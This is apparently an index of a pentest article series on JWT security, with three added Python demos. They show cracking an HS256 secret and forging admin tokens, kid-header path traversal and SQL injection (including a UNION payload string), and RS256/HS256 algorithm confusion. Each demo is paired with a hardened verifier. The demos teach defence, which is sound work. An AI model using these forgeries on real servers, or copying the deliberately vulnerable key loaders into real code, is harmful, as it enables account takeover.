The series finale. Shor's algorithm breaks every asymmetric JWT algorithm. ML-DSA signatures at 2.4 KB don't fit in a cookie. SD-JWT for selective disclosure. Harvest Now, Decrypt Later — why migrating JWE to post-quantum cryptography is needed now.
RFC 8725 — fifteen JWT security rules from the standard's authors. For each — which attack from the series it prevents, which CVEs exist, and why ~65% of applications don't check aud. Plus three new rules from the 2026 bis update.
JWT isn't perfect — 70+ CVEs over ten years. We break down the alternatives: PASETO without an alg field, Macaroons with caveat-based attenuation, opaque tokens with instant revocation, Google/Netflix-style server-side sessions. For each: what to break on a pentest.
CVE-2025-20188 (CVSS 10.0): the eight-character hardcoded JWT secret 'notfound' in a Cisco IOS XE Lua script means root RCE on enterprise equipment. 17% of JWT CVEs in 2024-2026 are hardcoded secrets. Where to look: git history, Docker layers, JS bundles, source maps, firmware.
Leak three bits of the nonce from each ECDSA signature — and after 100 signatures you have the full private key. Minerva, TPM-FAIL, EUCLEAK: real attacks on real devices, and what's actually applicable on a web pentest right now.
Found a reflected XSS? If the app keeps JWTs in localStorage, that's not just alert(1): every user who triggers the payload hands you their token, and with it their account. We cover theft from every storage type, CSP bypass via WebRTC and CSS injection, and the only defenses that actually work.
At the seams between OAuth and OIDC components, attacks emerge that don't exist in isolation: token confusion, cross-service relay, ALBeast in AWS, and DPoP bypass — with real CVEs and step-by-step pentest checks.
Which library is running on the backend determines which attacks will actually land: a ranked breakdown of the most vulnerable JWT libraries, a tier classification from recommended to dangerous, and passive fingerprinting techniques that identify the stack from the token header alone.
JWE is the encrypted side of JWT that almost nobody talks about. Five parts, two encryption layers, and a whole zoo of attacks: Invalid Curve on ECDH-ES, Bleichenbacher on RSA1_5, Padding Oracle on AES-CBC, PBES2 DoS with a single request, and the forbidden attack on AES-GCM (nonce reuse).
The math behind HMAC, RSA, and ECDSA from an attacker's perspective: why Sony lost the PlayStation 3 to a single repeated number (the ECDSA nonce), and how leaking just a few nonce bits is enough to recover a private key.
A JWT contains everything an offline attack needs: the message and its signature. Hashcat on a GPU tries around 150 million HS256 candidates per second; the secret 'secret' falls in 2 seconds.
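The offline attack in miniature, as an added example that is not code from the post: a captured HS256 token, a small constructed wordlist, and the same HMAC computation a cracker runs per guess, followed by the forgery the recovered secret enables. The token, wordlist and claims are made up; hashcat does the same job at GPU speed with mode 16500 (JWT) fed the raw token.

```python
import base64
import hashlib
import hmac
import json


def _b64u(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _unb64u(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    header = _b64u(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64u(json.dumps(payload, separators=(",", ":")).encode())
    mac = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64u(mac)}"


def verify_hs256(token: str, secret: bytes) -> dict:
    """Server side: pin the algorithm before touching the key, compare MACs in constant time."""
    h64, b64, s64 = token.split(".")
    if json.loads(_unb64u(h64)).get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    expected = hmac.new(secret, f"{h64}.{b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64u(s64)):
        raise ValueError("bad signature")
    return json.loads(_unb64u(b64))


def crack_hs256(token: str, candidates):
    """Offline dictionary attack. No round-trips to the server: header.payload is the
    message and the third segment is the MAC, so every guess is checked locally."""
    h64, b64, s64 = token.split(".")
    alg = json.loads(_unb64u(h64)).get("alg")
    if alg != "HS256":
        raise ValueError(f"expected HS256, token says {alg!r}")
    signing_input = f"{h64}.{b64}".encode()
    target = _unb64u(s64)
    for guess in candidates:
        if hmac.new(guess.encode(), signing_input, hashlib.sha256).digest() == target:
            return guess
    return None


def hs256_secret_is_adequate(secret: bytes) -> bool:
    """RFC 7518 section 3.2: an HS256 key must be at least 256 bits (32 bytes).
    Length is the floor, not a guarantee: a 32-byte dictionary phrase is still weak."""
    return len(secret) >= 32


# Constructed sample: a token as captured from a request, plus a tiny wordlist.
CAPTURED = sign_hs256({"sub": "1001", "role": "user"}, b"secret")
WORDLIST = ["password", "changeme", "jwt_secret", "secret", "s3cr3t"]


def demo() -> dict:
    secret = crack_hs256(CAPTURED, WORDLIST)
    # Once the secret is known the attacker signs whatever claims they like,
    # and the real server, using its real secret, accepts them.
    forged = sign_hs256({"sub": "1", "role": "admin"}, secret.encode())
    return {"secret": secret, "forged_payload": verify_hs256(forged, b"secret")}
```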
RFC 7515 leaves the structure of kid unspecified. Developers use it as a file path, a SQL parameter, or a command argument, and each choice is its own vulnerability class: path traversal, SQL injection, command injection.
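The file-path and SQL variants side by side, as an added example that is not code from the post: one HS256 verifier, two vulnerable key loaders that let the kid header reach the filesystem and the database, and the hardened loader that allowlists the identifier and parameterises the query. The server layout (a keys/ directory, a static/robots.txt the attacker can fetch, a SQLite key table, the kid "app-2026") is constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import os
import re
import sqlite3
import tempfile


def _b64u(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _unb64u(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, secret: bytes, kid: str) -> str:
    h64 = _b64u(json.dumps({"alg": "HS256", "kid": kid}, separators=(",", ":")).encode())
    b64 = _b64u(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h64}.{b64}." + _b64u(hmac.new(secret, f"{h64}.{b64}".encode(), hashlib.sha256).digest())


def verify_hs256(token: str, key_loader) -> dict:
    """Server side. The only difference between the vulnerable and the hardened
    deployment is how key_loader turns the untrusted kid header into key bytes."""
    h64, b64, s64 = token.split(".")
    header = json.loads(_unb64u(h64))
    if header.get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    expected = hmac.new(key_loader(header["kid"]), f"{h64}.{b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64u(s64)):
        raise ValueError("bad signature")
    return json.loads(_unb64u(b64))


# Constructed server layout: a key file under keys/, a world-readable static file
# next to it, and a key table in SQLite. All names are made up for the demo.
ROOT = tempfile.mkdtemp()
KEY_DIR = os.path.join(ROOT, "keys")
os.makedirs(KEY_DIR)
os.makedirs(os.path.join(ROOT, "static"))
REAL_SECRET = os.urandom(32).hex()
with open(os.path.join(KEY_DIR, "app-2026.key"), "w") as fh:
    fh.write(REAL_SECRET)
with open(os.path.join(ROOT, "static", "robots.txt"), "w") as fh:
    fh.write("User-agent: *\nDisallow: /admin\n")  # content anyone can fetch anonymously
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE keys (kid TEXT PRIMARY KEY, secret TEXT)")
DB.execute("INSERT INTO keys VALUES (?, ?)", ("app-2026", REAL_SECRET))


def load_key_from_path(kid: str) -> bytes:
    """VULNERABLE: kid is joined into a path, so '../' reaches any readable file
    (on Linux, ../../dev/null is the classic choice: it yields an empty key)."""
    with open(os.path.join(KEY_DIR, kid), "rb") as fh:
        return fh.read()


def load_key_from_sql(kid: str) -> bytes:
    """VULNERABLE: kid is concatenated into SQL, so a UNION returns a key the attacker chose."""
    row = DB.execute(f"SELECT secret FROM keys WHERE kid = '{kid}'").fetchone()
    return row[0].encode()


KID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def load_key_safe(kid: str) -> bytes:
    """HARDENED: allowlist the identifier, then a parameterised lookup; kid is never a path or SQL."""
    if not KID_RE.fullmatch(kid):
        raise ValueError("malformed kid")
    row = DB.execute("SELECT secret FROM keys WHERE kid = ?", (kid,)).fetchone()
    if row is None:
        raise KeyError("unknown kid")
    return row[0].encode()


ATTACKS = [  # (kid the attacker puts in the header, key the attacker signs with)
    ("../static/robots.txt", b"User-agent: *\nDisallow: /admin\n"),
    ("x' UNION SELECT 'attacker-key' --", b"attacker-key"),
]


def forge_via_path_traversal() -> dict:
    kid, key = ATTACKS[0]
    return verify_hs256(sign_hs256({"sub": "attacker", "role": "admin"}, key, kid), load_key_from_path)


def forge_via_sql_injection() -> dict:
    kid, key = ATTACKS[1]
    return verify_hs256(sign_hs256({"sub": "attacker", "role": "admin"}, key, kid), load_key_from_sql)


def hardened_rejects_both() -> bool:
    for kid, key in ATTACKS:
        try:
            verify_hs256(sign_hs256({"sub": "attacker"}, key, kid), load_key_safe)
            return False
        except (ValueError, KeyError):
            pass
    legit = sign_hs256({"sub": "alice"}, REAL_SECRET.encode(), "app-2026")
    return verify_hs256(legit, load_key_safe)["sub"] == "alice"
```

Both forgeries rely on the same property: the attacker does not need the real key, only a kid that makes the server verify with key material the attacker already knows. The command-argument variant from the teaser is the same shape again, with the shell in place of the filesystem or the database.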
Take the server's public key from wherever it is published (a JWKS endpoint, a PEM in a repo), use it as the HMAC secret for an HS256 token, and a server that lets the token's own alg header pick the verification routine accepts it. The signature exists and it checks out, yet the token is forged: algorithm confusion.
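The key-confusion attack above as an added example, not code from the post. It needs a genuine RS256 path, so a small textbook RSASSA-PKCS1-v1_5/SHA-256 implementation is included rather than a third-party library. The published key is modelled as a JWK JSON string instead of a PEM; that changes nothing about the attack, since whatever text the server hands its verifier as "the key" is public, and the attacker feeds exactly that text to HMAC. The seeded key, the key-material format and the claims are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import math
import random


def _b64u(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _unb64u(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


# Just enough RSASSA-PKCS1-v1_5 with SHA-256 to have a real RS256 verify path.
_DIGESTINFO_SHA256 = bytes.fromhex("3031300d060960864801650304020105000420")


def _is_probable_prime(n: int, rng: random.Random, rounds: int = 24) -> bool:
    """Miller-Rabin; n is odd and large by construction."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def rsa_keygen(bits: int = 512, seed: int = 7):
    """Textbook keygen from a seeded RNG so the demo is reproducible; never seed real keys."""
    rng, e = random.Random(seed), 65537

    def prime() -> int:
        while True:
            c = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if _is_probable_prime(c, rng):
                return c

    while True:
        p, q = prime(), prime()
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (p * q, e), (p * q, pow(e, -1, phi))


def _emsa_pkcs1(msg: bytes, k: int) -> bytes:
    t = _DIGESTINFO_SHA256 + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def rsa_sign(msg: bytes, priv) -> bytes:
    n, d = priv
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_emsa_pkcs1(msg, k), "big"), d, n).to_bytes(k, "big")


def rsa_verify(msg: bytes, sig: bytes, pub) -> bool:
    n, e = pub
    k = (n.bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big") == _emsa_pkcs1(msg, k)


PUB, PRIV = rsa_keygen()
# What the server publishes (a JWKS entry) and, in the vulnerable setup, the very
# string it passes to its verifier as "the key".
PUBLISHED_KEY = json.dumps({"kty": "RSA", "n": _b64u(PUB[0].to_bytes(64, "big")),
                            "e": _b64u(PUB[1].to_bytes(3, "big"))})


def _token(header: dict, payload: dict, signer) -> str:
    h64 = _b64u(json.dumps(header, separators=(",", ":")).encode())
    b64 = _b64u(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h64}.{b64}." + _b64u(signer(f"{h64}.{b64}".encode()))


def _split(token: str):
    h64, b64, s64 = token.split(".")
    return json.loads(_unb64u(h64)), f"{h64}.{b64}".encode(), _unb64u(s64), json.loads(_unb64u(b64))


def issue_rs256(payload: dict) -> str:
    return _token({"alg": "RS256"}, payload, lambda m: rsa_sign(m, PRIV))


def forge_with_public_key(payload: dict, published_key: str) -> str:
    """Attacker: the public key text is the HMAC secret, and the header says HS256."""
    return _token({"alg": "HS256"}, payload, lambda m: hmac.new(published_key.encode(), m, hashlib.sha256).digest())


def verify_vulnerable(token: str, key_material: str) -> dict:
    """The classic library bug: one untyped key argument, and the token's own alg
    header decides whether it is an HMAC secret or an RSA public key."""
    header, msg, sig, payload = _split(token)
    ok = False
    if header.get("alg") == "HS256":
        ok = hmac.compare_digest(hmac.new(key_material.encode(), msg, hashlib.sha256).digest(), sig)
    elif header.get("alg") == "RS256":
        jwk = json.loads(key_material)
        ok = rsa_verify(msg, sig, (int.from_bytes(_unb64u(jwk["n"]), "big"), int.from_bytes(_unb64u(jwk["e"]), "big")))
    if not ok:
        raise ValueError("bad signature")
    return payload


def verify_pinned(token: str, pub) -> dict:
    """Hardened: the verifier fixes the algorithm and the key is typed, so alg in the header is inert."""
    header, msg, sig, payload = _split(token)
    if header.get("alg") != "RS256" or not rsa_verify(msg, sig, pub):
        raise ValueError("bad signature or algorithm")
    return payload


def demo() -> dict:
    forged = forge_with_public_key({"sub": "attacker", "role": "admin"}, PUBLISHED_KEY)
    try:
        verify_pinned(forged, PUB)
        pinned = "accepted"
    except ValueError:
        pinned = "rejected"
    return {"vulnerable": verify_vulnerable(forged, PUBLISHED_KEY)["role"], "pinned": pinned}
```

The fix is not "reject HS256 when you expect RS256" bolted on as a special case; it is that the accepted algorithm comes from server configuration and the key object is of one type, so a header-chosen algorithm never selects a different primitive over the same bytes. Real libraries that do this take an explicit algorithms allowlist on the verify call.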